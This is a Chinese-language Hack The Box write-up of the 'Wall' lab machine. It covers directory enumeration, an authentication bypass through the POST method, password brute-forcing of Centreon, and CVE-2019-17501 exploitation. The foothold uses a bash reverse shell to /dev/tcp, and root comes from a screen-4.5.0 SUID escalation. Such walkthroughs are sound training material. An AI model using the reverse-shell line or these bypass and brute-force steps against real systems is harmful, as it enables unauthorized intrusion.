Hack the box_Wall
- 2020 年 3 月 10 日
- 筆記
大家好,今天給大家帶來的CTF挑戰靶機是來自hackthebox的「Wall」,hackthebox是一個非常不錯的在線實驗平台,能幫助你提升滲透測試技能和黑盒測試技能,平台上有很多靶機,從易到難,各個級別的靶機都有。本級靶機難度為簡單級別,任務是找到靶機上的user.txt和root.txt。
信息枚舉
masscan掃描開放端口

nmap探測22,80端口的服務信息,發現被過濾了

利用gobuster掃描web
->gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.157
->/.hta (Status: 403)
->/.htpasswd (Status: 403)
->/.htaccess (Status: 403)
->/index.html (Status: 200)
->/monitoring (Status: 401)
->/server-status (Status: 403)
只有monitoring有點用,不過monitoring需要認證才能登錄發現只要把訪問方式改為POST就能繞過認證進去發現這是一個centreon系統(Centreon是一個網絡,系統,應用程序監督和監視工具)登陸處有一個csrf令牌驗證,每次訪問都會更改

在官網中得知,我們訪問/api/index.php?action=authenticate,並且提供登錄登錄信息,將可以繞過令牌校驗,從而達到爆破目的

我們使用Seclist字典進行爆破密碼為 password1

我們發現了系統版本為19.04.0

低權限shell
該系統存在CVE-2019-13024漏洞,不過當我使用poc嘗試攻擊時,發現poc用不了,payload有一個過濾處響應403 後來我發現了CVE-2019-17501,這個要簡單一點在http://10.10.10.157/centreon/main.php?p=60807&o=a&type=4中寫入bash並用SimpleHTTPServer上傳自己的webshellwebshell如下
->#!/bin/bash
->bash -i >& /dev/tcp/10.10.xx.xx/xxxx 0>&1

再次寫入bash命令獲得反向連接shell
->bash /tmp/n00b.sh
並且獲得TTY終端

權限提升
在使用自動化腳本枚舉系統信息中發現系統中有一個不常見的suid二進制文件:
/bin/screen-4.5.0

使用poc獲得root權限

最後我們得到了user.txt、root.txt
手握日月摘星辰,安全路上永不止步。
– Khan攻防安全實驗室